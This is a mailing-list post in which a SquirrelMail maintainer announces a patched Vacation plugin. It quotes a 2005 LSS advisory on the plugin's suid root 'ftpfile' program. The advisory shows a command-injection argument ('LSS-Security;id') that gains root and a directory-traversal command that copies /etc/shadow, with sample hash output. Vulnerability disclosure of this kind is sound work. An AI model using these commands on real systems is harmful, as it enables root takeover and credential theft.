<<< Date Index >>>     <<< Thread Index >>>

Re: Squirrelmail vacation v0.15 local root exploit



All,

A new release of this plugin that addresses this exploit is now available at:

http://www.squirrelmail.org/plugin_view.php?id=51

Due to the severity of the exploits in prior versions, upgrade is highly recommended. Also, please keep in mind that while the SquirrelMail team takes security very seriously, it cannot take full responsibility for the plethora of third-party plugins, of which this is one. LSS team: pleeeease let us know *before* you are going to make your announcement next time.

 - Paul Lesneiwski



                        LSS Security Advisory #LSS-2005-01-03
                               http://security.lss.hr

---

Title : Squirrelmail vacation v0.15 local root exploit Advisory ID : LSS-2005-01-03 Date : 10.01.2005. Advisory URL: : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact                  :  Privilege escalation and arbitrary file read
Risk level : High Vulnerability type : Local
Vendors contacted       :  No response from vendor


---



===[ Overview
Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message to incoming email. That is commonly used to notify the sender of the receiver's absence. Vacation plugin specifically uses the Vacation program.
Plugin can be downloaded from:
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz



===[ Vulnerability

Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
The program is used to access local files in user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile. Command line arguments are passed to execve() function without checking
for meta-characters, therefore making possible execution of commands as root.

[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$  ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$
It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other
directory without checking file name for directory traversal attack.

$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow[ljuranic@laptop ljuranic]$ head ./shadow
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
bin:*:10929:0:99999:7:::
daemon:*:10929:0:99999:7:::
lp:*:10929:0:99999:7:::
[ljuranic@laptop ljuranic]$


===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.



===[ Fix

Not available yet.



===[ PoC Exploit

http://security.lss.hr/exploits/



===[ Credits

Credits for this vulnerability goes to Leon Juranic.


===[ LSS Security Contact
LSS Security Team, <eXposed by LSS> WWW : http://security.lss.hr
 E-mail : security@xxxxxx
 Tel    : +385 1 6129 775